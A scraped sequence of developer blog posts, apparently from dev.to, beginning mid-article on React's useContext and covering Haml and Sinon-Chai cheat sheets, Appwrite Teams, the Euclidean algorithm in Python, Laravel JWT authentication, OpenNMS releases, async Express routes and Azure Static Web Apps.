The second thing is the consumer. This is what you must wrap your code in to access the value of the context. This component expects a function as the child of it and that function gives you the value of the context as the only argument for the function. Then in that function you can just return the JSX that component utilizes the context.
The above code is a little bit painful because the consumer interface is hard to work with.
Luckily, with function components, we can avoid all that messy code by using the useContext hook.
In order to use context data in a function component, you no longer need to wrap the JSX in a consumer. Instead, all you need to do is pass your context to the useContext hook and it will do all the magic for you:
```js
function GrandChildComponent() {
  const { theme, setTheme } = useContext(ThemeContext)
  return (
    <>
      <div>The theme is {theme}</div>
      <button onClick={() => setTheme('light')}>
        Change To Light Theme
      </button>
    </>
  )
}
```
Conclusion
In the end the useContext hook is very simple to use. All it does is provide a nice interface for consuming context data, but that interface is so much better than the original context consumer interface. Next time if you are working with context in your application make sure to give useContext a try.
If you want to learn React Js we strongly recommend AchieversIT

| sivavadlamuri |
696,963 | Haml Cheat Sheet | Ruby -# This is a comment -# Anything starting with a hyphen signals to Haml that Ruby... | 0 | 2021-05-13T09:22:39 | https://dev.to/hoanganhlam/haml-cheat-sheet-54gn | haml, cheatsheet |
### Ruby
```haml
-# This is a comment
-# Anything starting with a hyphen signals to Haml that Ruby is coming
- @arr = [1, 2, 3]
- @str = "test"
-# Equal signals output
= render partial: "shared/header"
= yield
= link_to page_url
```
### Inline Attributes
Either hash syntax works
```haml
%meta{ name: "viewport", content: "width=device-width, initial-scale=1.0" }
%input{ :type => "text", :required => true }
```
### Classes and ID's
```haml
%p.class-example
.no-tag-defaults-to-div
%div#butItCanBeIncluded
```
### Tags
```haml
%html
%head
%title
%body
%h1 Hello World
%br/
```
### Doctype
```haml
!!! 5
```
### Reference
* [Haml Cheat Sheet](https://cheatsheetmaker.com/haml) - [Cheat Sheet Maker](https://cheatsheetmaker.com) | hoanganhlam |
697,130 | Sinon-Chai Cheat Sheet | Should spy.should.have.been.called spy.should.have.been.calledOnce spy.shou... | 0 | 2021-05-13T11:21:56 | https://dev.to/hoanganhlam/sinon-chai-cheat-sheet-55fe | sinonchai, cheatsheet |
### Should
```
spy.should.have.been.called
spy.should.have.been.calledOnce
spy.should.have.been.calledTwice
spy.should.have.been.calledThrice
spy1.should.have.been.calledBefore(spy2)
spy1.should.have.been.calledAfter(spy2)
spy.should.have.been.calledWithNew
spy.should.always.have.been.calledWithNew
spy.should.have.been.calledOn(context)
spy.should.always.have.been.calledOn(context)
spy.should.have.been.calledWith(...args)
spy.should.always.have.been.calledWith(...args)
spy.should.always.have.been.calledWithExactly(...args)
spy.should.always.have.been.calledWithExactly(...args)
spy.should.have.been.calledWithMatch(...args)
spy.should.always.have.been.calledWithMatch(...args)
spy.should.have.returned(returnVal)
spy.should.have.always.returned(returnVal)
spy.should.have.thrown(errorObjOrErrorTypeStringOrNothing)
spy.should.have.always.thrown(errorObjOrErrorTypeStringOrNothing)
```
### Expect
```
expect(spy).called
expect(spy).calledOnce
expect(spy).calledTwice
expect(spy).calledThrice
expect(spy).calledBefore
expect(spy).calledAfter
expect(spy).calledWithNew
expect(spy).alwaysCalledWithNew
expect(spy).calledOn
expect(spy).alwaysCalledOn
expect(spy).calledWith
expect(spy).alwaysCalledWith
expect(spy).calledWithExactly
expect(spy).alwaysCalledWithExactly
expect(spy).calledWithMatch
expect(spy).alwaysCalledWithMatch
expect(spy).returned
expect(spy).alwaysReturned
expect(spy).threw
expect(spy).alwaysThrew
```
### Initialization
```js
var sinon = require('sinon');
require('chai').use(require('sinon-chai'));
```
### Reference
* [Sinon-Chai Cheat Sheet](https://cheatsheetmaker.com/sinon-chai) - [Cheat Sheet Maker](https://cheatsheetmaker.com) | hoanganhlam |
697,188 | #30DaysOfAppwrite : Appwrite Teams | Intro #30DaysOfAppwrite is a month-long event focused on giving developers a walkthrough... | 0 | 2021-05-13T13:09:02 | https://dev.to/appwrite/30daysofappwrite-appwrite-teams-2fjd | javascript, webdev, flutter, 30daysofappwrite | ## Intro
[#30DaysOfAppwrite](http://30days.appwrite.io/) is a month-long event focused on giving developers a walkthrough of all of Appwrite's features, starting from the basics to more advanced features like Cloud Functions! Alongside we will also be building a fully-featured Medium clone to demonstrate how these concepts can be applied when building a real-world app. We also have some exciting prizes for developers who follow along with us!
## Teams API
Welcome to Day 13 👋. Today we'll go through the Teams API and understand how it allows us to manage permissions for groups of users easily. The main purpose of the Teams API is to create groups of users and grant bulk permissions in an easy way. These permissions can then be used to control access to Appwrite's resources like documents and files in storage.
Let's say you have a text file that you would like to share with a group of friends. In that case, you can create a team and give different roles to the team members. (view, edit, comment, owner etc.)
Team permissions in Appwrite use one of the following syntaxes:
* **team:[TEAM_ID]**
This permission grants access to any member of the specific team. To gain access to this permission, the user must be the team creator (owner), or receive and accept an invitation to join this team.
* **member:[MEMBER_ID]**
This permission grants access to a specific member of a team. This permission will only be valid as long as the user is still an active member of the specific team. To view a user's member ID, fetch the team members list using the [Get Team Memberships](https://appwrite.io/docs/client/teams?sdk=web#teamsGetMemberships) endpoint.
* **team:[TEAM_ID]/[ROLE]**
This permission grants access to any member who possesses a specific role in a team. To gain access to this permission, the user must be a member of the specific team and have the given role assigned to them. Team roles can be assigned when inviting a user to become a team member. `ROLE` can be any string. However, the `owner` role is created automatically when a new team is created from a Client SDK.
Let's take a few examples to make this clear:
| Permission | Description |
| ---- | ---- |
| team:abcd | Access to all members of team abcd |
| team:abc | Access to all members of team abc |
| member:abc | Access to a user with membershipId abc |
| team:abcd/owner | Access to members of team abcd who have the role `owner`. By default, only the creator of the team has this role. |
| team:abcd/viewer | Access to members of team abcd who have the role `viewer`. |
The Teams API is accessible from both the Client and Server SDKs. We will cover how to create these teams and assign roles using both the Client and Server SDKs 😊.
## Gotchas
There are notable differences between when you create a team from a client-side SDK and when you create a team using a server-side SDK.
When a user creates a team using a Client SDK, they become the team owner and are automatically assigned the **`team:[TEAM_ID]/owner`** role.
When you create a team using a Server SDK using an API key, there is no logical owner since API keys run in [admin mode](https://appwrite.io/docs/admin). In this case, the Server SDK should also create the first member of the team and explicitly assign the owner permissions. We will cover these with an example.
## Client SDK
This is where you can find the docs for the [Client Teams API](https://appwrite.io/docs/client/teams). Creating a team is really simple - all you need to do is think of a "Really Cool Name".
```js
let promise = sdk.teams.create('unique()', 'Really Cool Name');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
Notice the first parameter we passed in, which is the string `'unique()'`, which tells Appwrite to generate a random team ID for the new team. Appwrite supports custom IDs, so you can pass in your own custom IDs using this parameter, too.
This will create a team with the current user as the `owner`. You can verify this by heading to your **Appwrite Console** > **Users** > **Teams** > **Really Cool Name**

To add new members to this team, you can make use of the [`createMembership()`](https://appwrite.io/docs/client/teams#teamsCreateMembership) function. Only `owners` of a team can add new members to the team. An email with a link to join the team will be sent to the new member's email address. If the member doesn't exist in the project, it will be created automatically.
> Before this, ensure that you have SMTP setup on your Appwrite Server. We covered this in our previous tutorial on Day 11.
Let's say you would like to invite a new member ( `email@example.com` ) to your team and grant them two new roles in the team, namely: `viewer` and `editor`. You can do this using the following snippet. Use the 'URL' parameter to redirect the user from the invitation email back to your app. When the user is redirected, use the [Update Team Membership Status](https://appwrite.io/docs/client/teams?sdk=web#teamsUpdateMembershipStatus) endpoint to allow the user to accept the invitation to the team.
```js
let promise = sdk.teams.createMembership('[TEAM_ID]', 'email@example.com', '', ['viewer', 'editor'], 'https://example.com/acceptTeamInvite');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
When the user clicks on the team invitation email from their inbox, they will be redirected to `https://example.com/acceptTeamInvite?teamId=xxx&inviteId=yyy&userId=zzz&secret=xyz`. The four parameters can then be extracted from the query string, and the `updateMembershipStatus()` method can be called to confirm membership to the team.
```js
let promise = sdk.teams.updateMembershipStatus('[TEAM_ID]', '[INVITE_ID]', '[USER_ID]', '[SECRET]');
promise.then(function (response) {
console.log(response); // Success
}, function (error) {
console.log(error); // Failure
});
```
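As an aside, the four values can be pulled off the redirect URL with the standard `URL`/`URLSearchParams` API before making that call (in a browser you would parse `window.location.href`; the URL below just mirrors the example redirect above):

```javascript
// Parse the invite redirect URL and extract the query parameters Appwrite appends.
const redirect = new URL('https://example.com/acceptTeamInvite?teamId=xxx&inviteId=yyy&userId=zzz&secret=xyz');

const teamId = redirect.searchParams.get('teamId');
const inviteId = redirect.searchParams.get('inviteId');
const userId = redirect.searchParams.get('userId');
const secret = redirect.searchParams.get('secret');

console.log(teamId, inviteId, userId, secret); // → xxx yyy zzz xyz
```

These values can then be passed straight into `updateMembershipStatus()`.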
We will use this in practice in tomorrow's tutorial where we add support to invite users to a team in our blog app!
## Server SDK
The server version of the function looks really similar to the client version, but the key difference here is the usage of an API key with the `teams.read` and `teams.write` scopes. This function creates a team, but unlike the Client SDK, this team has no members yet.
```js
const sdk = require('node-appwrite');
// Init SDK
let client = new sdk.Client();
let teams = new sdk.Teams(client);
client
.setEndpoint('https://<HOSTNAME_OR_IP>/v1') // Your API Endpoint
.setProject('<Your Project ID>') // Your project ID
.setKey('<Your API Key>') // Your secret API key
;
let promise = teams.create('unique()', 'Really Cool Team');
promise.then(function (response) {
console.log(response);
}, function (error) {
console.log(error);
});
```
We need to explicitly add members to this team using the Server version of [`createMembership()`](https://appwrite.io/docs/server/teams?sdk=nodejs#teamsCreateMembership). The parameters here are exactly the same as the Client version.
```js
let promise = teams.createMembership('[TEAM_ID]', 'email@example.com', '', ['owner'], 'https://example.com/acceptTeamInvite');
promise.then(function (response) {
console.log(response);
}, function (error) {
console.log(error);
});
```
When a new member is added to the team from the server, email verification is not required, and hence no email will be sent in this case.
That's a wrap! You now know how to add new members to your team, both from the client and the server. In the next article, we will add this functionality to our demo app!
## Credits
We hope you liked this write-up. You can follow [#30DaysOfAppwrite](https://twitter.com/search?q=%2330daysofappwrite) on Social Media to keep up with all of our posts. The complete event timeline can be found [here](http://30days.appwrite.io)
* [Discord Server](https://appwrite.io/discord)
* [Appwrite Homepage](https://appwrite.io/)
* [Appwrite's Github](https://github.com/appwrite)
Feel free to reach out to us on Discord if you would like to learn more about Appwrite, Aliens or Unicorns 🦄. Stay tuned for tomorrow's article! Until then 👋
| christyjacob4 |
697,397 | Euclidean Algorithm meaning & python snippet | This algorithm helps us get the greatest common divisor(gcd) of 2 integers. In other words, the resul... | 0 | 2021-05-13T16:24:41 | https://dev.to/coucoseth/euclidean-algorithm-meaning-python-snippet-4la5 | machinelearning, python, algorithms | This algorithm helps us get the greatest common divisor (gcd) of 2 integers. In other words, the result of our computation is the highest possible number `(let's say 1)` that divides both given numbers `(4 and 5)` with a remainder `(or you could say the leftover after a division)` of zero. Let's break this down a little bit:
our two numbers earlier were `4` and `5`, but these could be any two positive integers which follow two rules:
1st >> one number must be larger than the other (we divide the larger by the smaller).
2nd >> the smaller number must not be zero.
The Euclidean algorithm formula is `q = a * b + r` where the letters are placeholders for numbers, for example
```
5 = 4 * 1 + 1 or
11 = 2 * 5 + 1
```
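As a quick sanity check, Python's built-in `divmod` (which we'll lean on later) confirms both identities:

```python
# divmod(q, a) returns (quotient, remainder), i.e. q = a * quotient + remainder
print(divmod(5, 4))   # → (1, 1)   because 5 = 4 * 1 + 1
print(divmod(11, 5))  # → (2, 1)   because 11 = 2 * 5 + 1
```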
Let's get our hands a little dirty and see how we arrived at the equations for 5 and 11 above:
`now is the time to open your editor and create a python file so we can write some simple code. my file is called index.py`
When calculating we always have our 2 numbers, remember earlier we chose `(4 and 5)`. These numbers replace `q` and `a` whereby `q` takes the bigger number `(5)` and `a` the smaller `(4)` so `5 = 4 * b + r` therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
```
Our task is to find numbers to replace `b` and `r` to complete our equation. According to the Euclidean algorithm, `b` is the number of times `a` goes into (divides) `q` while `r` is the remainder of that operation.
So `4` goes into `5` once with a remainder of `1`, so we will assign our remainder to `r` and our quotient to `b`. In Python we can use a built-in function called `divmod()` to do this computation; it takes the two numbers as arguments and returns the quotient and remainder as a tuple, therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
```
However, according to the Euclidean algorithm, our remainder must reach zero, so if `r` isn't `0` we aren't done. It states that we have to place `a` in the position of `q` and `r` in the position of `a`, or simply replace our initial values that were used in the calculation with new values following the above procedure, therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
q = a
a = r
```
Take a scenario where you didn't use `(4 and 5)`, but perhaps `(11 and 5)`. You will have to repeat the calculations until `r = 0`. When `r = 0`, the gcd is the value `r` held just before the final calculation that produced `r = 0`. Therefore in `index.py` we can use a for loop to do our calculations over and over until `r = 0`:
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
q = a
a = r
finalResult = 0 #initialize a variable outside the for loop so
#that it is accessed globally
for i in range(q):
finalResult = r #store our gcd value as the loop is starting so
#that we can capture the previous value of r
#before the calculation which equates `r = 0`
result = divmod(q,a)
b = result[0]
r = result[1]
if r == 0:
break #constantly check the current value in r and make sure
#when it is 0 you can stop the loop
q = a
a = r
print(finalResult)
```
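For reference, the same repeated-division idea fits in a tiny while loop. The function name `gcd` below is my own wrapper, not part of the snippet above, and it agrees with Python's standard `math.gcd`:

```python
import math

def gcd(q, a):
    # Keep replacing (q, a) with (a, r) until the remainder is zero;
    # the last non-zero remainder is the greatest common divisor.
    while a != 0:
        q, a = a, q % a
    return q

print(gcd(5, 4))    # → 1
print(gcd(11, 5))   # → 1
print(gcd(48, 18))  # → 6
assert gcd(48, 18) == math.gcd(48, 18)
```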
And that's it folks, Enjoy
Find me on [twitter](https://twitter.com/CoucoSeth) | coucoseth |
697,423 | May 2021 Releases – Horizon 27.2.0, Meridians 2021.1.0, 2020.1.8, 2019.1.19, and 2018.1.28 | In May, we released updates to all OpenNMS Horizon and Meridian versions under active support, and... | 0 | 2021-05-24T16:54:40 | https://www.opennms.com/en/blog/2021-05-13-may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28/?utm_source=rss&utm_medium=rss&utm_campaign=may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28 | news, horizon, meridian | ---
title: May 2021 Releases – Horizon 27.2.0, Meridians 2021.1.0, 2020.1.8, 2019.1.19, and 2018.1.28
published: true
cover_image: https://pbs.twimg.com/media/E1SY105WQAYSr1B?format=jpg&name=medium
date: 2021-05-13 15:20:10 UTC
tags: News,Horizon,Meridian
canonical_url: https://www.opennms.com/en/blog/2021-05-13-may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28/?utm_source=rss&utm_medium=rss&utm_campaign=may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28
---
In May, we released updates to all OpenNMS Horizon and Meridian versions under active support, and released the first iteration of Meridian 2021.
### Horizon 27.2.0
Horizon 27.2.0 is a release primarily targeting bug fixes, plus it includes our new branding refresh.
The codename for 27.2.0 is [_Magrathea_](https://hitchhikers.fandom.com/wiki/Magrathea).
For a high-level overview of what has changed in Horizon 27, see [What’s New in OpenNMS Horizon 27](https://docs.opennms.org/opennms/releases/27.2.0/releasenotes/releasenotes.html#releasenotes-27).
For a complete list of changes in 27.2.0, see [the detailed release notes](https://docs.opennms.org/opennms/releases/27.2.0/releasenotes/releasenotes.html#releasenotes-changelog-27.2.0).
### Meridian Point Releases
Meridian 2018.1.28 was a tiny release, containing only an update to Apache Commons IO.
Meridian 2019.1.19 adds a backport of a number of browser security issues fixed the previous month in newer releases, plus a few other bug fixes.
Meridian 2020.1.8 contains all of those changes, plus a few other small bug fixes.
For a list of changes, see the release notes:
- [2018.1.28](https://meridian.opennms.com/releasenotes/2018/latest/#_release_meridian_2018_1_28) ([_Solar Storm_](https://wikipedia.org/wiki/Solar_storm))
- [2019.1.19](https://meridian.opennms.com/releasenotes/2019/latest/#_release_meridian_2019_1_19) ([_Ditsö̀_](https://wikipedia.org/wiki/WASP-17b))
- [2020.1.8](https://meridian.opennms.com/releasenotes/2020/latest/#_release_meridian_2020_1_8) ([_Isthmus_](https://wikipedia.org/wiki/Isthmus))
### Meridian 2021
May also saw the release of Meridian 2021.1.0, the first in the 2021 series.
It is based on Horizon 27, which has proven to be one of our most solid series in quite a while. The most notable changes since Meridian 2020 (based on Horizon 26) are the removal of the legacy Remote Poller and the introduction of Application Perspective Monitoring, performing a similar set of functions using the Minion. Additionally, there are tons of bug fixes and other smaller feature improvements.
For an overview of what's changed since Meridian 2020, see the [What's New](https://docs.opennms.com/meridian/2021.1.0/releasenotes/whatsnew.html) section of the Meridian 2021 documentation.
Sharp readers will notice this is on our new [docs.opennms.com](https://docs.opennms.com/) site. We are in the process of moving projects from publishing to [docs.opennms.org](https://docs.opennms.org/) to the new Antora-based unified docs site. | rangerrick |
697,495 | If you had a time machine what is ONE thing you would tell yourself when you started coding? | I would probably tell myself to look up what imposter syndrome is so I can be relieved from all my do... | 0 | 2021-05-13T18:55:55 | https://dev.to/inspirezone/if-you-had-a-time-machine-what-is-one-thing-you-would-tell-yourself-when-you-started-coding-2jn2 | watercooler, career, beginners, reflect | I would probably tell myself to look up what imposter syndrome is so I can be relieved from all my doubts... Only discovered it was a real thing years into my career.
What about you? I’m very curious to know! | funbeedev |
697,637 | How to do Async express routes! | Overview I recently took a job at a product development company focusing on Back-end Devel... | 0 | 2021-05-14T17:50:13 | https://dev.to/ctooley21/how-to-do-async-express-routes-2imb |
# Overview
I recently took a job at a product development company focusing on Back-end Development! Part of the reality of working here is having to learn new technologies pretty often to fit whatever use-case we are going for. Recently we've been doing lots of web development using a combination of React & Node.js. Working in a JavaScript ecosystem is great, since we don't need to worry about parsing data ever and the Node environment is lightning fast, but we have to make sure that EVERYTHING is Asynchronous.
Developing in an asynchronous manner was a struggle at first, if you search online, you'll find many different options with various pros & cons. We tried three different setups in the span of about a month before finally coming to a point where we didn't want to bang our heads on the table when we had to develop or modify complex business logic. Hopefully today I'll be able to pass on some of the information that we learned so that you can hit the ground running!
# Our options
When I first arrived at work and starting developing, this is what our initial code looked like:
## Nested callbacks
```
router.post("/store/update", (req, res) => {
var someQuery = "CALL GetStore(?);";
sql.query(someQuery, [req.query.storeID], function(error, result) {
var store = result[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
sql.query(otherQuery, [req.query.storeID, field1, field2], function(error, result) {
//blah blah, nested queries
res.status(200).send();
});
}
});
});
```
You get the idea right? Lots of nesting in callbacks anytime we wanted to get some data, and then do other things on top of it. I **hated** it. To be fair I wrote most of this, and it wasn't really an issue till you get to 2+ levels of indention and need to change things. It gets especially tough when you want to add conditional queries as there is only one path of execution and its gotta be straight down the nesting tree.
After my frustration with nested callbacks had boiled up to an unimaginable level I had to change something! I started reading about promises online and saw the potential and got the go-ahead from my boss to convert our now 1-2 month old application to promise based.
## The Next Step: Promises
```
router.post("/store/update", (req, res) => {
var someQuery = "CALL GetStore(?);";
sql.query(someQuery, [req.query.storeID])
.then((result) => {
var store = result[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
return sql.query(otherQuery, [req.query.storeID, field1, field2]);
}
return;
}).then((result) => {
//do something here with the result of otherQuery
res.status(200).send();
}).catch((error) => {
//Handle any error that occured in either of the sql queries
console.log(error);
});
});
```
This was a little bit better. Promises enabled us to turn our horizontal problem (chains getting super wide) into a vertical issue. Still annoying after the first few days. It again like callbacks, would get really complicated and nearly impossible to write if you needed to add conditional Async requests.
## Our Savior: Async/Await syntax
So for us, promises were a big step up from callbacks, but as you can tell there was still lots of extra syntax and chaining that was really not needed. Async/Await syntax lets us get past that super easily. It still requires promise based functions, so for the previous example as well as this one, our SQL query function would be defined like so:
```
function query(query, values) {
return new Promise((resolve, reject) => {
conn.query(query, values, function (error, results) {
if (error) {
reject(error);
return;
}
resolve(results);
});
});
}
```
And switching to Async/Await syntax gives us this lovely, clean, and synchronous looking code:
```
router.post("/store/update", async (req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [req.query.storeID]);
var store = someQueryResult[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send();
});
```
Ding Ding Ding!!!! We have a winner. I **love** it. Clean, functional and no nesting!
Our only last issue with this situation revolves around error handling. With promises, you get your result in a .then() if there is one, and you get the error in the .catch() if there is one. But for async/await syntax the await part takes care of our .then(), but we still need a way to catch any errors so that our app doesn't crash. The following is an option:
```
var someQueryResult = await sql.query(someQuery, [req.query.storeID]).catch((error) => {
console.log(error);
});
```
But I am not the biggest fan of this, it adds a lot more code that we need to write for each function, and generally our queries should not return errors, just data (empty or not). So we decided to only catch errors when we absolutely need to, to be able to do this we turned to a cool little library called express-async-handler. What this async handler lets us do is turn every single one of our express routes into a promise, so that we can do async/await syntax inside of them, and if any error happens it would be caught with a .catch() and passed to a error handler that we define. It looks like this:
```
const ash = require('express-async-handler');
router.post("/store/update", ash(async (req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [req.query.storeID]);
var store = someQueryResult[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send()
}));
```
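For intuition, the core of express-async-handler is tiny. Conceptually it just wraps the route handler in a promise and forwards any rejection to `next()`; the sketch below is my own rough equivalent, not the library's exact source:

```javascript
// Conceptual sketch of what express-async-handler does:
// wrap a possibly-async route handler so any rejection is handed to next(err)
// instead of becoming an unhandled promise rejection.
const asyncHandler = (fn) => (req, res, next) =>
  Promise.resolve(fn(req, res, next)).catch(next);

// Tiny demo without Express: a handler that throws...
const failing = asyncHandler(async (req, res) => {
  throw new Error("boom");
});

// ...ends up invoking next(error) rather than crashing the process.
failing({}, {}, (err) => console.log("caught:", err.message));
```

Because every rejection funnels into `next(err)`, Express hands it to whatever error middleware you registered.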
and our error handler:
```
app.use((error, req, res, next) => {
var status = error.status || 500;
res.status(status).json({
message: error.message
});
if(status != 500) {
console.log('We have encounted an error: ' + error.message + ' - ' + error.status);
console.log(error.stack);
}
});
```
This is awesome! It allows us to ignore errors generally, knowing that if they happen they get caught, logged and returned as a 500 to the request (which fits logically). To put the icing on the cake, we can also create our own errors using an npm package called http-errors. This is really just a little helper that we can pass our status and message to, which then get used in the error handler.
```
const createError = require('http-errors');
router.post("/store/update", ash(async (req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [req.query.storeID]).catch((error) => {
console.log(error);
});
var store = someQueryResult[0][0];
if (store == undefined || store == null) {
throw createError(404, 'That store object does not exist.');
}
}
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send()
}));
```
Well that is it! After the switch to Async/Await syntax and adding the async handler & error catcher, we were able to make our code super clean and easy to work with. It is no longer a huge pain to go back and update routes to add new logic, and will aid the readability of our code in the future.
Thank you for reading and I hope I was able to help even just a little bit! | ctooley21 | |
697,650 | Laravel 8 and JWT Authentication (tymon/jwt-auth) with a custom Model | In this article I'll show how to implement JWT authentication (using the tymon/jwt-auth package) in... | 0 | 2021-05-14T23:16:02 | https://dev.to/wenlopes/laravel-8-e-autenticacao-jwt-tymon-jwt-auth-com-model-customizada-2l7k | laravel, php, jwt, auth | In this article I'm going to show how to implement JWT authentication (using the **tymon/jwt-auth** package) in a Laravel 8 API, using a Model other than the default one (Users). At the end of the text, I'll share the link to the repository containing the implementation of the steps in this article :)
So let's go!
## Installation
Run the command to install the package
```bash
composer require tymon/jwt-auth
```
Publish the library's configuration file to your config folder with the command
```bash
php artisan vendor:publish --provider="Tymon\JWTAuth\Providers\LaravelServiceProvider"
```
Finally, let's generate the JWT secret using the command
```bash
php artisan jwt:secret
```
This command will add the JWT_SECRET variable to your `.env` file
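The resulting `.env` entry looks like this (the value below is just a placeholder; yours will be a freshly generated random key):

```
JWT_SECRET=<your-generated-secret>
```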
If you have any questions about the installation process, [check the package's official page](https://jwt-auth.readthedocs.io/en/develop/laravel-installation/) with installation instructions.
## Model Configuration
As mentioned earlier, we will use a Model other than Users to store user data. In our case, we will create a new Model called Employee.
To do that, let's create a migration that creates a table in our database with the same name as the Model:
```bash
php artisan make:migration create_employee_table --create=employee
```
Our migration will have the same structure as the users migration that comes by default with a Laravel installation, the only difference being one extra field called "job_title". Feel free to add new columns, but make sure the "email" and "password" columns are created.
```php
Schema::create('employee', function (Blueprint $table) {
$table->id();
$table->string('name');
$table->string('email')->unique();
$table->string('password');
$table->string('job_title');
$table->timestamps();
});
```
Remove the migration that creates the users table and run the migrations
```bash
php artisan migrate
```
Create the Employee Model
```bash
php artisan make:model Employee
```
*Note: Add the $table property to the model to set the table name in the singular, because when we create the test user (a little further on in this article), Laravel will by default look for the table name in the plural, which will cause an error. If you created your table in the plural (employees), skip the step below.*
```php
protected $table = 'employee';
```
After creating our Model, let's implement the JWTSubject interface, implementing its methods. In addition, we'll extend Laravel's Authenticatable class. In the end, this will be the content of our Model
{% gist https://gist.github.com/WenLopes/29dbdc460badddfde6388caefa610342 %}
Very well, now that our Model is properly created and configured, it's time to configure our authentication provider. To do that, open the config/auth.php file and add a new 'employees' key to the 'providers' array, containing the driver (in our case, we'll use Eloquent) and the desired model.

Next, in the same file, go to the "guards" array and, in the "api" array, set the "jwt" driver and the "employees" provider we just created.

Finally, let's set the "api" guard as our application's default. In the same file, go to the "defaults" array and set the default guard to "api"

Once that's done, we've finished configuring our provider, and the final content of the config/auth.php file will be this
{% gist https://gist.github.com/WenLopes/2ad0b52e47cd2163642e857bb21d4c05 %}
## Creating the controller and route
Very well, now that we have created and configured our Model, let's create the authentication controller to test our implementation.
Create the AuthController controller with the same content shown in this [link from the package's official site](https://jwt-auth.readthedocs.io/en/develop/quick-start/) and then create the login route in the `routes/api.php` file
*Note: Don't forget that as of Laravel 8, the controller must be imported in the routes file*
```php
use App\Http\Controllers\AuthController;
Route::post('auth/login', [AuthController::class, 'login'])->name('auth.login');
```
To test our endpoint, let's create a record in the employee table and use its data to authenticate.
In the `DatabaseSeeder` file, insert the following content inside the `run` method:
```php
\App\Models\Employee::create([
'name' => 'Usuário de teste',
'email' => 'usuario@teste.com.br',
'password' => bcrypt( 'senha123' ),
'job_title' => 'Gerente administrativo'
]);
```
And then run the command:
```bash
php artisan db:seed
```
Finally, use your preferred API client and call the login route **api/auth/login**, providing the email and password created in the seeder. If everything went well, the result will look like the one below:

And that's it, your authentication with a custom model is working.
As I said earlier, you can download the project with this implementation from my Github repository (link below). In that repository, I'm using Docker for the infrastructure, with Nginx, Mysql and Laravel 8. In addition, I implemented the [Strategy pattern](https://refactoring.guru/pt-br/design-patterns/strategy) to return messages for authentication errors and/or expired tokens, where in the second case a new, refreshed token is returned (I'm preparing a new article to cover this topic :).
[Click here to access the repository](https://github.com/WenLopes/laravel8-jwt)
So that's it folks, if you have any questions, leave them in the comments. Thanks and see you next time | wenlopes
697,829 | Everything you need to know to deploy an Azure Static Web App | Azure Static Web Apps are so easy to use and integrate with Github Actions, Azure Functions or your custom authentication. Here is everything you need to deploy. | 0 | 2021-05-14T21:39:44 | https://dev.to/azure/everything-you-need-to-know-to-deploy-an-azure-static-web-app-fm6 | staticwebapps, azure, serverless, javascript | ---
title: Everything you need to know to deploy an Azure Static Web App
published: true
description: Azure Static Web Apps are so easy to use and integrate with Github Actions, Azure Functions or your custom authentication. Here is everything you need to deploy.
tags: staticwebapps, azure, serverless, JavaScript
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hwpjmzkf8oruna4eu73v.png
---
With [Azure Static Web Apps](https://azure.microsoft.com/en-us/services/app-service/static/?WT.mc_id=javascript-57623-ayyonet#overview) you can host your serverless web app, continuously deploy with Github Actions and easily integrate with your Azure APIs or add your own custom authentication and domains.
Sounds too good to be true? Well, I would have thought so too if I hadn't deployed and set up automation with Github Actions, without needing to know anything about actions, in minutes.
You can read more about the key [Azure Static Web App features](https://docs.microsoft.com/en-us/azure/static-web-apps/overview?WT.mc_id=javascript-57623-ayyonet#key-features) or dive right into it. **Seeing is believing**, so here are all the things that you can get started with depending on your preference:
* [Tutorials](#tutorials)
* [How to Guides](#how-to-guides)
* [Code Samples](#code-samples)
### Tutorials
[](https://youtu.be/VzML-6DClVU)
* [Azure Learn Modules](https://docs.microsoft.com/en-us/learn/paths/azure-static-web-apps/?WT.mc_id=javascript-57623-ayyonet) covering everything from **Angular, React, Svelte, Vue, Gatsby** and plain old **JavaScript** to publishing a **Blazor WebAssembly app and .NET API**
* [Tutorials](https://docs.microsoft.com/azure/static-web-apps/publish-gatsby?WT.mc_id=javascript-57623-ayyonet) for working with static site generators to working with databases.
### How to Guides
[](https://youtube.com/playlist?list=PLlrxD0HtieHgMPeBaDQFx9yNuFxx6S1VG)
* [Setup your local development environment](https://docs.microsoft.com/azure/static-web-apps/local-development?WT.mc_id=javascript-28641-ayyonet)
* [Configure your frontend framework of your choice](https://docs.microsoft.com/en-us/azure/static-web-apps/front-end-frameworks?WT.mc_id=javascript-28641-ayyonet)
* [How to integrate with your Azure Functions](https://docs.microsoft.com/en-us/azure/static-web-apps/functions-bring-your-own?WT.mc_id=javascript-28641-ayyonet)
* [How to use a database with Azure Static Web Apps](https://docs.microsoft.com/en-us/azure/static-web-apps/add-mongoose?WT.mc_id=javascript-28641-ayyonet)
